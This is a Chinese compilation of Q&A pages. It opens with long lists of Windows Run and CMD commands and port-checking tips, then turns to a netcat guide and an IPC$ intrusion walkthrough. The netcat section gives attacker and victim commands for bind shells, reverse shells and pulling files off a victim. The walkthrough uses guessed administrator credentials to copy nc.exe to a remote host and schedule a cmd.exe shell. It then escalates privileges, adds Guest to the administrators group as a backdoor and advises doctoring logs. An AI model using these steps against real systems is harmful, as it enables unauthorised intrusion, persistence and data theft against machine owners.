『壹』 計算機命令
regedit注冊表
給你一個資料,想必對你來講有保存價值:
開始菜單中的「運行」是通向程序的快捷途徑,輸入特定的命令後,即可快速的打開Windows的大部分程序,熟練的運用它,將給我們的操作帶來諸多便捷。
winver 檢查Windows版本
wmimgmt.msc 打開Windows管理體系結構(wmi)
wupdmgr Windows更新程序
wscript Windows腳本宿主設置
write 寫字板
winmsd 系統信息
wiaacmgr 掃描儀和照相機向導
winchat xp自帶區域網聊天
mem.exe 顯示內存使用情況
msconfig.exe 系統配置實用程序
mplayer2 簡易widnows media player
mspaint 畫圖板
mstsc 遠程桌面連接
mplayer2 媒體播放機
magnify 放大鏡實用程序
mmc 打開控制台
mobsync 同步命令
dxdiag 檢查directx信息
drwtsn32 系統醫生
devmgmt.msc 設備管理器
dfrg.msc 磁碟碎片整理程序
diskmgmt.msc 磁碟管理實用程序
dcomcnfg 打開系統組件服務
ddeshare 打開dde共享設置
dvdplay dvd播放器
net stop messenger 停止信使服務
net start messenger 開始信使服務
notepad 打開記事本
nslookup 網路管理的工具向導
ntbackup 系統備份和還原
narrator 屏幕「講述人」
ntmsmgr.msc 移動存儲管理器
ntmsoprq.msc 移動存儲管理員操作請求
netstat -an (tc)命令檢查介面
syncapp 創建一個公文包
sysedit 系統配置編輯器
sigverif 文件簽名驗證程序
sndrec32 錄音機
shrpubw 創建共享文件夾
secpol.msc 本地安全策略
syskey 系統加密,一旦加密就不能解開,保護Windows xp系統的雙重密碼
services.msc 本地服務設置
sndvol32 音量控製程序
sfc.exe 系統文件檢查器
sfc /scannow windows文件保護 tsshutdn 60秒倒計時關機命令
tourstart xp簡介(安裝完成後出現的漫遊xp程序)
taskmgr 任務管理器
eventvwr 事件查看器
eudcedit 造字程序
explorer 打開資源管理器
packager 對象包裝程序
perfmon.msc 計算機性能監測程序
progman 程序管理器
regedit.exe 注冊表
rsop.msc 組策略結果集
regedt32 注冊表編輯器
rononce -p 15秒關機
regsvr32 /u *.dll 停止dll文件運行
regsvr32 /u zipfldr.dll 取消zip支持
cmd.exe cmd命令提示符
chkdsk.exe chkdsk磁碟檢查
certmgr.msc 證書管理實用程序
calc 啟動計算器
charmap 啟動字元映射表
cliconfg sql server 客戶端網路實用程序
clipbrd 剪貼板查看器
conf 啟動netmeeting
compmgmt.msc 計算機管理
cleanmgr 垃圾整理
ciadv.msc 索引服務程序
osk 打開屏幕鍵盤
odbcad32 odbc數據源管理器
oobe/msoobe /a 檢查xp是否激活
lusrmgr.msc 本機用戶和組
logoff 注銷命令
iexpress 木馬捆綁工具,系統自帶
nslookup ip地址偵測器
fsmgmt.msc 共享文件夾管理器
utilman 輔助工具管理器
gpedit.msc 組策略
以下為Windows操作系統的常用運行命令,執行這些命令,就能打開系統對應的相關實用程序,如果大家能基本利用,就能檢查並修復系統的最基本的故障,除注銷,關閉系統命令外,其它所有命令,大家不妨一試!!
運行\輸入CMD\輸入 對應的相關實用程序:
. 打開C:\Documents and Settings\XXX(當前登錄Windows XP的用戶名)
.. 打開Windows XP所在的盤符下的Documents and Settings文件夾
... 打開「我的電腦」選項。
accwiz.exe 輔助工具向導
actmovie.exe 直接顯示安裝工具
append.exe 允許程序打開制定目錄中的數據
arp.exe 顯示和更改計算機的IP與硬體物理地址的對應列表
at.exe 計劃運行任務
atmadm.exe ATM調用管理器統計
attrib.exe 顯示和更改文件和文件夾屬性
autochk.exe 檢測修復文件系統 (XP不可用)
autoconv.exe 在啟動過程中自動轉化系統 (XP不可用)
autofmt.exe 在啟動過程中格式化進程 (XP不可用)
autolfn.exe 使用長文件名格式 (XP不可用)
arp.exe 顯示和更改計算機的IP與硬體物理地址的對應
calc.exe 計算器
Bootvrfy.exe 通報啟動成功
cacls.exe 顯示和編輯ACL
cdplayer.exe CD播放器
change.exe 與終端伺服器相關的查詢 (XP不可用)
charmap.exe 字元映射表
chglogon.exe 啟動或停用會話記錄 (XP不可用)
chgport.exe 改變埠(終端服務) (XP不可用)
chgusr.exe 改變用戶(終端服務) (XP不可用)
chkdsk.exe 磁碟檢測程序
chkntfs.exe NTFS磁碟檢測程序
cidaemon.exe 組成Ci文檔服務
cipher.exe 在NTFS上顯示或改變加密的文件或目錄
cisvc.exe 打開索引內容
ckcnv.exe 變換Cookie
cleanmgr.exe 磁碟清理
cliconfg.exe SQL客戶網路工具
clipbrd.exe 剪貼簿查看器
clipsrv.exe 運行Clipboard服務
clspack.exe 建立系統文件列表清單
cluster.exe 顯示域的集群 (XP不可用)
cmd.exe 進2000\XP DOS
cmdl32.exe 自動下載連接管理
cmmgr32.exe 連接管理器
cmmon32.exe 連接管理器監視
cmstp.exe 連接管理器配置文件安裝程序
comclust.exe 集群
comp.exe 比較兩個文件和文件集的內容
conf 啟動netmeeting聊天工具
control userpasswords2 XP密碼管理.
compmgmt.msc 計算機管理
cprofile.exe 轉換顯示模式 (XP不可用)
開始,運行,輸入CMD\輸入net config workstation計算機名 \完整的計算機名\用戶名
工作站處於活動狀態(即網路描述) \軟體版本(即軟體版本號) \工作站域 工作站域的 DNS 名稱
登錄域 \COM 打開時間超時(秒) \COM 發送量(位元組) \COM 發送超時 (msec)
CMD\輸入net config workstation 更改可配置工作站服務設置。
CMD\輸入net config server 可以顯示不能配置的下伺服器計算機名 \伺服器注釋 \伺服器版本(即軟體版本號)
伺服器處於活動狀態(即網路描述) \伺服器處於隱藏狀態(即 /hidden 設置)
最大登錄用戶數(即可使用伺服器共享資源的最大用戶數)
每個會話打開文件的最大數(即用戶可在一個會話中打開伺服器文件的最大數)
空閑會話時間(最小值)
chkdsk.exe 磁碟檢查.
Chkdsk /r 2000命令控制台中的Chkdsk /r命令檢查修復系統文件
cleanmgr 垃圾整理
Clipbrd 剪貼板查看器
C:boot.ini 打開啟動菜單
compact.exe 顯示或改變NTFS分區上文件的壓縮狀態
conime.exe IME控制台
control.exe 控制面板
convert.exe NTFS 轉換文件系統到NTFS
convlog.exe 轉換IIS日誌文件格式到NCSA格式
cprofile.exe 轉換顯示模式
cscript.exe 較本宿主版本
csrss.exe 客戶伺服器Runtime進程 (XP不可用)
csvde.exe 格式轉換程序 (XP不可用)
dcpromo 活動目錄安裝(XP不可用)
drwtsn32 系統醫生
diskmgmt.msc 磁碟管理器(和PowerQuest PartitionMagic 8.0)
dvdplay DVD 播放器
devmgmt.msc 設備管理器(檢查電腦硬體,驅動)
dxdiag 檢查DirectX信息
dcomcnfg.exe DCOM配置屬性 (控制台根目錄)
dcpromo.exe 安裝向導 (XP不可用)
ddeshare.exe DDE共享
debug.exe 檢查DEBUG
dfrgfat.exe FAT分區磁碟碎片整理程序
dfrgntfs.exe NTFS分區磁碟碎片整理程序 (XP不可用)
dfs_cmd_.exe 配置DFS樹 (XP不可用)
dfsinit.exe 分布式文件系統初始化(XP不可用)
dfssvc.exe 分布式文件系統伺服器 (XP不可用)
diantz.exe 製作CAB文件
diskperf.exe 磁碟性能計數器
dmremote.exe 磁碟管理服務的一部分 (XP不可用)
doskey.exe 命令行創建宏
dosx.exe DOS擴展
dplaysvr.exe 直接運行幫助 (XP不可用)
drwatson.exe 華生醫生錯誤檢測
drwtsn32.exe 華生醫生顯示和配置管理
dvdplay.exe DVD播放
dxdiag.exe Direct-X診斷工具
edlin.exe 命令行的文本編輯
esentutl.exe MS資料庫工具
eudcedit.exe 造字程序
eventvwr.exe 事件查看器
exe2bin.exe 轉換EXE文件到二進制
expand.exe 解壓縮
extrac32.exe 解CAB工具
fsmgmt.msc 共享文件夾
fastopen.exe 快速訪問在內存中的硬碟文件
faxcover.exe 傳真封面編輯
faxqueue.exe 顯示傳真隊列
faxsend.exe 發送傳真向導
faxsvc.exe 啟動傳真服務
fc.exe 比較兩個文件的不同
find.exe 查找文件中的文本行
findstr.exe 查找文件中的行
finger.exe 一個用戶並顯示出統計結果
fixmapi.exe 修復MAPI文件
flattemp.exe 允許或者禁用臨時文件目錄 (XP不可用)
fontview.exe 顯示字體文件中的字體
forcedos.exe 強制文件在DOS模式下運行
ftp.exe FTP下載
gpedit.msc 組策略
gdi.exe 圖形界面驅動
grpconv.exe 轉換程序管理員組
hostname.exe 顯示機器的Hostname
Internat 輸入法圖標
iexpress 木馬捆綁工具,系統自帶
ieshwiz.exe 自定義文件夾向導
iexpress.exe iexpress安裝包
iisreset.exe 重啟IIS服務(未安裝IIS,不可用)
internat.exe 鍵盤語言指示器 (XP不可用)
ipconfig.exe 查看IP配置
ipsecmon.exe IP安全監視器
ipxroute.exe IPX路由和源路由控製程序
irftp.exe 無線連接
ismserv.exe 安裝或者刪除Service Control Manager中的服務
jdbgmgr.exe Java4的調試器
jetconv.exe 轉換Jet Engine資料庫 (XP不可用)
jetpack.exe 壓縮Jet資料庫 (XP不可用)
jview.exe Java的命令行裝載者
label.exe 改變驅動器的卷標
lcwiz.exe 許可證向導 (XP不可用)
ldifde.exe LDIF目錄交換命令行管理 (XP不可用)
licmgr.exe 終端服務許可協議管理 (XP不可用)
lights.exe 顯示連接狀況 (XP不可用)
llsmgr.exe Windows 2000 許可協議管理 (XP不可用)
llssrv.exe 啟動許可協議伺服器 (XP不可用)
locator.exe RPC Locator 遠程定位
lodctr.exe 調用性能計數
logoff.exe 注銷當前用戶
lpq.exe 顯示遠端的LPD列印隊列的狀態,顯示被送到基於Unix的伺服器的列印任務
lpr.exe 用於Unix客戶列印機將列印任務發送給連接了列印設備的NT的列印機伺服器。
lsass.exe 運行LSA和Server的DLL
lserver.exe 指定默認Server新的DNS域 (XP不可用)
lusrmgr.msc 本地賬戶管理
mmc 控制台
mplayer2 播放器
macfile.exe 管理MACFILES (XP不可用)
magnify.exe 放大鏡
makecab.exe 製作CAB文件
mem.exe 顯示內存狀態
migpwd.exe 遷移密碼
mmc.exe 控制台
mnmsrvc.exe 遠程桌面共享
mobsync.exe 同步目錄管理器
mountvol.exe 創建、刪除或列出卷的裝入點。
mplay32.exe Media Player 媒體播放器
mpnotify.exe 通知應用程序
mqbkup.exe 信息隊列備份和恢復工具
mqmig.exe MSMQ Migration Utility 信息隊列遷移工具
mrinfo.exe 使用SNMP多點傳送路由
mscdexnt.exe 安裝MSCD
msdtc.exe 動態事務處理控制台
msg.exe 發送消息到本地或遠程客戶
mshta.exe HTML應用程序主機
msiexec.exe 開始Windows安裝程序
mspaint.exe 打開畫圖板
mstask.exe 任務計劃表程序
mstinit.exe 任務計劃表安裝
Msconfig.exe 系統配置實用程序 (配置啟動選項,服務項)
mem.exe 顯示內存使用情況
mspaint 畫圖板
Net Stop Messenger 停止信使服務
Net Start Messenger 恢復信使服務
nslookup 網路管理的工具
Nslookup IP 地址偵測器
ntbackup 系統備份和還原
nbtstat.exe 使用 NBT(TCP/IP 上的 NetBIOS)顯示協議統計和當前 TCP/IP 連接。
nddeapir.exe NDDE API伺服器端
netsh.exe 用於配置和監控 Windows 2000 命令行腳本介面(XP不可用)
netstat.exe 顯示協議統計和當前的 TCP/IP 網路連接。
nlsfunc.exe 載入特定國家的信息。Windows 2000 和 MS-DOS 子系統不使用該命令接受該命令只是為了與 MS-DOS 文件兼容。
notepad.exe 打開記事本
nslookup.exe 該診斷工具顯示來自域名系統 (DNS) 名稱伺服器的信息。
ntbackup.exe 備份和故障修復工具
ntfrs.exe NT文件復制服務 (XP不可用)
ntvdm.exe 模擬16位Windows環境
nw16.exe NetWare轉向器
nwscript.exe 運行Netware腳本
odbcad32.exe 32位ODBC數據源管理 (驅動程序管理)
odbcconf.exe 命令行配置ODBC驅動和數據源
packager.exe 對象包裝程序
pathping.exe 包含Ping和Tracert的程序
pentnt.exe 檢查Pentium的浮點錯誤
perfmon.exe 系統性能監視器
ping.exe 驗證與遠程計算機的連接
posix.exe 用於兼容Unix
print.exe 列印文本文件或顯示列印隊列的內容。
progman.exe 程序管理器
psxss.exe Posix子系統應用程序
qappsrv.exe 在網路上顯示終端伺服器可用的程序
qprocess.exe 在本地或遠程顯示進程的信息(需終端服務)
query.exe 查詢進程和對話 (XP不可用)
quser.exe 顯示用戶登陸的信息(需終端服務)
qwinsta.exe 顯示終端服務的信息
rononce -p 15秒關機
rasAdmin 遠程訪問服務.
regedit.exe 注冊表編輯器
rasadmin.exe 啟動遠程訪問服務 (XP不可用)
rasautou.exe 建立一個RAS連接
rasdial.exe 寬頻,撥號連接
ras.exe 運行RAS連接 (XP不可用)
rcp.exe 計算機和運行遠程外殼埠監控程序 rshd 的系統之間復制文件
rdpclip.exe 終端和本地復制和粘貼文件
recover.exe 從壞的或有缺陷的磁碟中恢復可讀取的信息。
redir.exe 運行重定向服務
regedt32.exe 32位注冊服務
regini.exe 用腳本修改注冊許可
regwiz.exe 注冊向導
replace.exe 用源目錄中的同名文件替換目標目錄中的文件。
rexec.exe rexec 命令在執行指定命令前,驗證遠程計算機上的用戶名,只有安裝了 TCP/IP 協議後才可以使用該命令。
risetup.exe 運行遠程安裝向導服務 (XP不可用)
route.exe 控制網路路由表
rsh.exe 在運行 RSH 服務的遠程計算機上運行命令
rsnotify.exe 遠程存儲通知回顯
runas.exe 允許用戶用其他許可權運行指定的工具和程序
rundll32.exe 啟動32位DLL程序
rwinsta.exe 重置會話子系統硬體和軟體到最初的值
Sndvol32 音量控製程序
sfc.exe 或CMD\ sfc.exe 回車 系統文件檢查器
services.msc 網路連接服務
syskey 系統加密,(一旦加密就不能解開,保護windows xp系統的雙重密碼wupdmgr WIDNOWS UPDATE)
SCANREG/RESTORE 命令恢復最近的注冊表
secedit.exe 自動化安全性配置管理
services.exe 控制所有服務
sethc.exe 設置高對比
setver.exe 設置 MS-DOS 子系統向程序報告的 MS-DOS 版本號
sfc.exe 系統文件檢查
shadow.exe 監控另外一台中端伺服器會話
shrpubw.exe 建立和共享文件夾
sigverif.exe 文件簽名驗證
smlogsvc.exe 性能日誌和警報 (XP不可用)
sndrec32.exe 錄音機
sndvol32.exe 顯示聲音控制信息
snmp.exe 簡單網路管理協議 (XP不可用)
snmptrap.exe SNMP工具 (XP不可用)
srvmgr.exe 伺服器管理器 (XP不可用)
subst.exe 將路徑與驅動器盤符關聯
sysedit.exe 系統配置編輯器
syskey.exe NT賬號資料庫加密工具
sysocmgr.exe > Windows 安裝程序
systray.exe 在低許可權運行systray
taskmgr 任務管理器
tasklist /svc(CMD)了解每個SVCHOST進程到底提供了多少系統服務(2000\98不可用)
tlist -S(CMD) 了解每個SVCHOST進程到底提供了多少系統服務(
taskman.exe 任務管理器 (XP不可用)
taskmgr.exe 任務管理器
tcmsetup.exe 電話服務客戶安裝
tcpsvcs.exe TCP服務
termsrv.exe 終端服務
tftp.exe 將文件傳輸到正在運行 TFTP 服務的遠程計算機或從正在運行 TFTP 服務的遠程計算機傳輸文件
themes.exe 桌面主題 (XP不可用)
tlntadmn.exe Administrator Telnet服務管理
tlntsess.exe 顯示目前的Telnet會話
tlntsvr.exe 開始Telnet服務
tracert.exe 診斷實用程序將包含不同生存時間 (TTL) 值的 Internet 控制消息協議 (ICMP) 回顯數據包發送到目標,以決定到達目標採用的路由
tsadmin.exe Administrator 終端服務管理器 (XP不可用)
tscon.exe 粘貼用戶會話到終端對話
tsdiscon.exe 斷開終端服務的用戶
tskill.exe 殺掉終端服務
tsprof.exe 用終端服務得出查詢結果
tsshutdn.exe 關閉系統
unlodctr.exe 性能監視器的一部分
upg351db.exe 升級Jet資料庫 (XP不可用)
ups.exe UPS service UPS服務
user.exe Windows核心服務
userinit.exe 打開我的文檔
usrmgr.exe 域用戶管理器
utilman.exe 指定2000啟動時自動打開那台機器
vwipxspx.exe 調用IPX/SPX VDM
w32tm.exe 時間伺服器
wextract.exe 解壓縮Windows文件
winchat.exe 打開Windows聊天工具
winhlp32.exe 運行幫助系統
winmsd.exe 查看系統信息
winver.exe 顯示Windows版本
wizmgr.exe Windows管理向導 (XP不可用)
wjview.exe Java 命令行調用Java
write.exe 打開寫字板
wscript.exe 腳本工具
wupdmgr.exe Windows update 運行Windows update升級向導
winver 檢查Windows版本
Win98系統工具
開始,運行,輸入Msconfig 系統配置實用工具 配置啟動選項,包括config.sys、autoexec.bat、win.ini、system.ini和注冊表及程序菜單中的啟動項。並可設置是否故障啟動。
開始,運行,輸入Regedit 注冊表修改工具 注冊表編輯器,如果沒有把握不要隨意修改注冊表!
開始,運行,輸入Regsvr32 dll注冊工具 當提示找不到dll文件時,可用此來注冊該動態連接庫。
開始,運行,輸入Regwiz 注冊向導 用於注冊。校驗系統文件,並可恢復系統文件。
如果啟動時出現類似*.vxd文件錯誤,可用此恢復該vxd文件。
開始,運行,輸入Scandskw 磁碟掃描程序,用於掃描修復磁碟。如果磁碟或文件出現錯誤,可用來初步修復。
開始,運行,輸入DxDiag DirectX診斷工具可用於檢測DirectX運行是否正常。
開始,運行,輸入NETSCAPE
ESC:清除當前命令行;
F7:顯示命令歷史記錄,以圖形列表窗的形式給出所有曾經輸入的命令,並可用上下箭頭鍵選擇再次執行該命令。
F8:搜索命令的歷史記錄,循環顯示所有曾經輸入的命令,直到按下回車鍵為止;
F9:按編號選擇命令,以圖形對話框方式要求您輸入命令所對應的編號(從0開始),並將該命令顯示在屏幕上;
Ctrl+H:刪除游標左邊的一個字元;
Ctrl+C Ctrl+Break,強行中止命令執行;
Ctrl+M:表示回車確認鍵;
Alt+F7:清除所有曾經輸入的命令歷史記錄;
Alt+PrintScreen:截取屏幕上當前命令窗里的內容。
病毒破壞了系統文件,請使用殺毒軟體查殺病毒,然後利用Windows 2000提供的「命令控制台」中的Chkdsk /r命令檢查修復系統文件即可。
『貳』 CMD命令提示符下如何開啟關閉埠
二樓的前提是 瑞士軍刀 自己下一個
Netstat
這個命令可以加一些參數:
-n 顯示IP地址和埠的數目。
-S 顯示每個協議的連接狀態。
-a 顯示所有的連接和監聽埠。(服務所有連接通常不顯示的)
-e 顯示太網的連接狀態。最好與-s合用。
-P PROTO 顯示特定的協議連接狀態。
關閉的話進 我的電腦右鍵-管理-服務。關閉相應的服務即關閉埠
在tcp/ip協議的高級里也可以
『叄』 怎麼把測試電腦埠是否開放
如何檢測(遠程)主機上的某個埠是否開啟,今天遇到一個問題就是在某某局點需要在某某防火牆上開放某些埠,但是我在某某防火牆上放開後,告知還是不能進行連接,我就想如何檢測本機或者遠程主機是否開放某某埠問題。
檢測(遠程)主機機是否開放某某埠:
windows下
在cmd裡面使用netstat -an命令來查看 開放的TCP和UDP埠。
在cmd裡面使用start /min telnet 127.0.0.1 某埠,之後會出現一個窗口,是最小化的,你等一會,如果窗口自動關閉了,說明埠是關閉,反之埠開放。
linux下
如windows下使用telnet的方法
使用nc命令
nc檢測埠的用法:
nc -z -w 10 %ip% %PORT%
-z表示檢測或者掃描埠
-w表示超時時間
-u表示使用UDP協議
例如:
# nc -z -w 10 -u 127.0.0.1 53
Connection to 127.0.0.1 53 port [udp/domain] succeeded!
# nc -z -w 10127.0.0.1 53
Connection to 127.0.0.1 53 port [tcp/domain] succeeded!
# echo $?
0
# nc -z -w 10 8.8.8.7 53
# echo $?
1
#
埠成功聯通返回值是0,提示succeeded;否則返回1,不提示任何數據。linux下未作測試,網友遇到的時候自行測試。
『肆』 電腦常識:DOS命令之NC的定義和用法是
NC(netcat)的使用方法!
連接到某處:nc [-options] hostname port[s] [ports].....
監聽某埠等待連接:nc -l -p port [options] [hostname] [port] -options
-d 後台運行
-e prog 程序重定向,一旦有連接,就執行綁定的程序。
-g gateway source-routing hop point[s], up to 8
-G num source-routing pointer: 4, 8, 12, ...
-h 幫助信息
-i 設定延時時間。
-l 監聽方式,等待連入。連接完成後,結束監聽。
-L 監聽方式,等待連入。連接完成後,繼續監聽。
-n 只能使用ip地址。
-o file 指定要傳送的16進制代碼。
-p port 指定本地的埠號。
-r 隨意指定本地或遠程埠號。
-s addr 本地的源地址。
-t 回顯telnet信息。
-u UDP方式。
-v 顯示詳細的信息,-vv 可獲取更詳細的信息。
-w 指定超時的時間。
-z 用於scan。
以上就是nc的一些參數和選項,注意,這是nt版本的nc。如果是*nix的需要自己編譯。也都差不多,只是netcat.c默認是沒有-t和-e這個兩個參數,要改。
看看它能幹些什麼,(偶就知道這些)
1.埠的刺探:
nc -vv ip port
2.掃描器
nc -v -w 5 ip port-port
nc -v -z ip port-port
3. 後門
victim machine:
nc -l -p port -e cmd.exe
nc -l -p port -e /bin/sh
attacker machine:
nc victim ip -p port
得到一個shell。
4.反向連接
attacker machine:
nc -vv -l -p port
victim machine:
nc -e cmd.exe attacker ip -p port
nc -e /bin/sh attacker ip -p port
或者:
attacker machine:
nc -vv -l -p port1 /*用於輸入*/
nc -vv -l -p prot2 /*用於顯示*/
victim machine:
nc attacker ip port1 | cmd.exe | nc attacker ip port2
nc attacker ip port1 | /bin/sh | nc attacker ip port2
5.傳送文件:
attacker machine <-- victim machine
nc -d -l -p port < path file /*attacker machine*/
nc -vv attacker ip -p port > path file /*victim machine*/
attacker machine --> victim machine
nc -vv -l -p > patm file/*victim machine*/
nc -d victim ip -p port < path file /*attacker machine*/
『伍』 怎樣用nc.exe和IPC$入侵電腦入侵時使用地命令是什麼~~~跪謝!!!!!!
IPC入侵攻略!其實針對IPC漏洞入侵的方法目前已經有很多的教程,但是其中很多教程並不完整,所以還是有很多網友來信問我關於IPC漏洞入侵的有關問題,這就是我寫這篇文章的原因了。如果你覺得本文也不完整,那隻好去找更好的版本了,但是我希望你能把你的意見和建議告訴我,讓我不斷的完善這篇文章。本文參考了小榕的流光2000說明文檔及其它相關文檔,也包含了一些自己的心得體會。本文歡迎非商業性轉載,但請保持文章完整性並註明出處!:-)
IPC是Internet Process Connection的縮寫,也就是遠程網路連接。它是Windows NT及Windows 2000特有的一項功能,特點是在同一時間內,兩個IP之間只允許建立一個連接。好了,廢話少說,現在進入主題。
如何找到具有IPC漏洞的主機呢?以前我都是組合一個國外的掃描工具(名字我忘了)和KillUSA的LetMeIn,因為很多工作都是手工完成的,所以速度可想而知了。現在因為有了小榕的流光2000,所以找到這樣的主機實在是太簡單了,具體操作我就不說了,大家可以參考該軟體的說明文檔。
好了,假設我們已經找到了一台這樣的主機,地址是139.223.200.xxx,管理員帳號是Administrator,密碼是123456。進入命令行方式,正式開工。需要說明的是,以下操作都是在目標主機沒有禁止遠程IPC$連接和啟動Schele服務的理想情況下進行的。
F:\》net use \\139.223.200.xxx\ipc$ "123456" /user:"Administrator"
命令成功完成。
F:\》 nc.exe \\139.223.200.xxx\admin$
已復制 1 個文件。
F:\》net time \\139.223.200.xxx
\\139.223.200.xxx 的當前時間是 2000/12/25 上午 10:25
在 \\139.223.200.xxx 的本地時間 (GMT - 07:00) 是 2000/12/25 上午10:35
命令成功完成。
F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
新增加了一項作業,其作業 ID = 0
F:\》telnet 139.223.200.xxx 1234
上面的命令很簡單,你只要參考一下net,at和nc的用法就可以了。這樣,我們就登上了遠程的主機。最理想的情況是這樣的,但是,也許你會遇到目標主機的Schele服務沒有啟動的情況,那麼,at命令就不能用了,我們就需要增加以下步驟。
F:\》at \\139.223.200.xxx 10:38 nc -l -p 1234 -t -e cmd.exe
服務仍未啟動。
F:\》netsvc \\139.223.200.xxx schele /start
Service is running on \\139.223.200.xxx
登上遠程主機之後,我們可以做什麼呢?這要視這個帳號的許可權以及該主機的安全策略來決定。如果你的許可權不夠的話,可以試試下面的步驟。首先在本地執行下面的命令。
F:\》 getadmin.exe \\139.223.200.xxx\admin$
已復制 1 個文件。
F:\》 gasys.dll \\139.223.200.xxx\admin$
已復制 1 個文件。
其次,在遠程主機運行下面的命令。
C:\WINNT\system32》getadmin
如果成功的話,你就是這台主機的管理員了,許可權夠大了吧?:-)
那麼,現在我們能做什麼呢?改主頁?下載SAM資料庫?都可以啦!方法有很多,我就不一一說了,具體方法可以參考相關教程。我一般對目標主機上的WORD文檔和資料庫比較感興趣,呵呵。。。
其實,如果你在這台機子上面放個木馬或者病毒什麼的東東,做起事來更容易一些,但是我覺得如果你跟他沒什麼深仇大恨的話,還是不要這么做了,這樣不好。
作完了你要做的事,不要忘了做個後門。
C:\WINNT\system32》net user Guest 30906766
net use Guest 30906766
The command completed successfully.
C:\WINNT\system32》net localgroup administrators Guest /add
net localgroup administrators Guest /add
The command completed successfully.
這是個比較簡單的後門,要想做的更好一些,可以象Linux那樣,做出一套RootKits來,其實這樣的東東目前已經有了,你只要拿來用就可以了。現在搞破壞真是簡單多了,那麼多的傻瓜工具任你用,哎!要想自保,不學點安全知識怎麼行呢?
最後,我們得修理一下日誌。雖然Redp0wer告訴我很少管理員會看NT的日誌,但是我想修理一下還是有用的。NT的日誌在什麼地方呢?可以參考XUDI的文章。但是有一點要記住的是,日誌只能修改,不能刪除,否則就是自己把自己出賣了!:-)這方面的命令行工具也不少,你可以到一些國外的站點去看看。